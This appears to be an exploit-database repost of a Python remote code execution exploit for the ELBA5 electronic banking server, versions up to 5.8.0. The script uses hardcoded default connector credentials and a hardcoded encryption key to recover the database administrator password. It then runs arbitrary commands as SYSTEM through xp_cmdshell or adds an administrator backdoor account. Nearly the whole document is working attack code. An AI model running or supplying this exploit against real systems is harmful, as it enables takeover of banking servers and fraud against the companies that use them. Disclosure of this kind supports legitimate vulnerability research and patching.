elba5 5.8.0 remote code execution

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elba5 5.8.0 remote code execution Code Code...
# Exploit Title: ELBA5 5.8.0 - Remote Code Execution # Date: 2018-11-16 # Exploit Author: Florian Bogner # Vendor Homepage: https://www.elba.at # Vulnerable Software: https://www.elba.at/eBusiness/01_template1/1206507788612244132-1206515595789049657_1206515641959948315-1292519691128454196-NA-38-NA.html # Version: up to 5.8.0 # Tested on: any Windows OS # Full Writeup: https://bogner.sh/2018/11/0-day-in-elba5s-network-installation-overtaking-your-companys-bank-account/ # Summary: This exploit has been tested against ELBA5 version 5.7.1 to 5.8.0. It can be used to remotely obtain code # execution on the ELBA5 server with full SYSTEM level permissions. Additionally, a backdoor user can be added Please see attachment for the full python exploit. import sys import hashlib try: import sqlanydb except: print("\n") print("==================================================") print("This exploit depends on the sqlanydb python module") print("Run \"pip install sqlanydb\" to install it") print("==================================================") print("\n") raise # this should be defined on the cli DB_HOST=None ACTION=None # The default ELBA port DB_PORT="2640" # The servername to connect to... does not really matter anywhay DB_SERVERNAME="ELBA5SRV" # The initial "connector" database user that is used to obtain the actual DBA credentials DB_CONNECTOR_UID="connector" DB_CONNECTOR_PWD="connector" # The actual DB user with DBA permissions DB_DBA_UID="elba" DB_DBA_PWD=None DB_DBA_ENCRYPTION_PWD="Af&Pw_dw7$Yd9#" def main(): print("==================================================") print(" ELBA5 Electronic Banking (https://www.elba.at/)") print(" Network Installation RCE Exploit") print("") print("This exploit has been tested against version 5.7.1") print("to 5.8.0. It can be used to remotely obtain code") print("execution on the ELBA5 server with full SYSTEM") print("level permissions.") print("") print("Discovered by: Florian Bogner @ Bee IT Security") print(" florian(at)bee-itsecurity.at") print("==================================================") print("") if (len(sys.argv)<3): print_usage() sys.exit(1) # get info from cli global DB_HOST global ACTION DB_HOST=sys.argv[1] ACTION=sys.argv[2] #### phase 1 print("[*] Starting phase 1: Obtain & Decrypt DBA password") DB_DBA_PWD=fetch_db_dba_pwd() if (DB_DBA_PWD==None): print("[-] Something went wrong in phase 1... Exiting") sys.exit(1) print("[+] Received the DBA password: "+DB_DBA_PWD) #### phase 2 print("[*] Starting phase 2: Establishing a DB connection as DBA") conn = sqlanydb.connect( uid=DB_DBA_UID, pwd=DB_DBA_PWD, servername='ELBA5SRV', host=''+DB_HOST+':'+DB_PORT ) if (conn==None): print("[-] Something went wrong in phase 2... Exiting") sys.exit(1) print("[+] Connection established as DBA") #### deliver payload if (ACTION=="addUser"): print("[*] Starting phase 3: Adding a backdoor user") add_elba_user(conn); elif (ACTION=="runCommand"): print("[*] Starting phase 3: Running command") run_command(conn); else: print("[*] Unknown action "+ACTION+"... Exiting cleanly") #### winding down print("[*] Closing DBA connection") conn.close() def print_usage(): print("Usage: "+sys.argv[0]+" <target> <action> <sub arguments...>"); print(""); print("target: The system to attack"); print("actions:"); print(" * addUser: adds an ELBA Backdoor user to the given install") print(" * runCommand: A command to run on the target as SYSTEM") print(" Provide the command to run as a sub argument") print(" (No output is provided)") def run_command(conn): if (len(sys.argv)!=4): print("[-] No command given... Exiting cleanly") return CMD=sys.argv[3] curs = conn.cursor() print("[*] Will try to execute: "+CMD) curs.execute("CALL xp_cmdshell('"+CMD+"');") curs.close() def add_elba_user(conn): USER_TO_ADD = "HACKER" USER_PASSWORD = "H4cker" # check if a user with the given name already exists print("[*] Checking if the username "+USER_TO_ADD+" is unused") curs = conn.cursor() curs.execute("SELECT * FROM \"elbndba\".\"BEDIENER\" WHERE BEDIENER='"+USER_TO_ADD+"'") rowset = curs.fetchall() curs.close() if (len(rowset)>0): print("[-] A user with the name "+USER_TO_ADD+" already exists! Exiting cleanly...") return # get the largest current bedienerKey print("[*] Request the largest current bedienerKey") curs = conn.cursor() curs.execute("SELECT MAX(bedienerKey) FROM \"elbndba\".\"BEDIENER\"") currentBedienerKey = curs.fetchone()[0] curs.close() newBedienerKey=currentBedienerKey+1 print("[*] Will use the new bedienerKey "+str(newBedienerKey)) # create password hash print("[*] Hash the password") usrdir="USER"+str(newBedienerKey) string_to_hash=USER_PASSWORD+str(newBedienerKey)+usrdir hash = hashlib.sha256(string_to_hash.encode('ascii','replace')).hexdigest() print("[*] Will use the hash: "+hash) # add the user print("[*] Finally adding the user") curs = conn.cursor() sql = "INSERT INTO \"elbndba\".\"BEDIENER\" (BEDIENER,NAME,ABTEILUNG,PASSWORT,GESPERRT,ADMIN,USRDIR,geloescht,bedienerKey) " sql += "VALUES ('"+USER_TO_ADD+"','"+USER_TO_ADD+"','','"+hash+"',0,1,'"+usrdir+"',0,"+str(newBedienerKey)+");" curs.execute(sql) # commit changes print("[*] Commiting changes") conn.commit() print("[+] Login as "+USER_TO_ADD+" with the password "+USER_PASSWORD) curs.close() # connect to the target host with the "connector" user and extract the dba password def fetch_db_dba_pwd(): target_host=''+DB_HOST+':'+DB_PORT print("[*] Trying to connect to the target server: "+target_host) conn = sqlanydb.connect( uid=DB_CONNECTOR_UID, pwd=DB_CONNECTOR_PWD, servername='ELBA5SRV', host=target_host ) print("[*] Extracting the secret key") curs = conn.cursor() curs.execute("SELECT DECRYPT(daten, '"+DB_DBA_ENCRYPTION_PWD+"', 'AES') FROM elbndba.connection") # decode the result to a valid utf-8 string decrypted_pwd=curs.fetchone()[0].decode("utf-8") ; curs.close() conn.close() return decrypted_pwd; main();

Elba5 5.8.0 remote code execution Vulnerability / Exploit Source : Elba5 5.8.0 remote code execution

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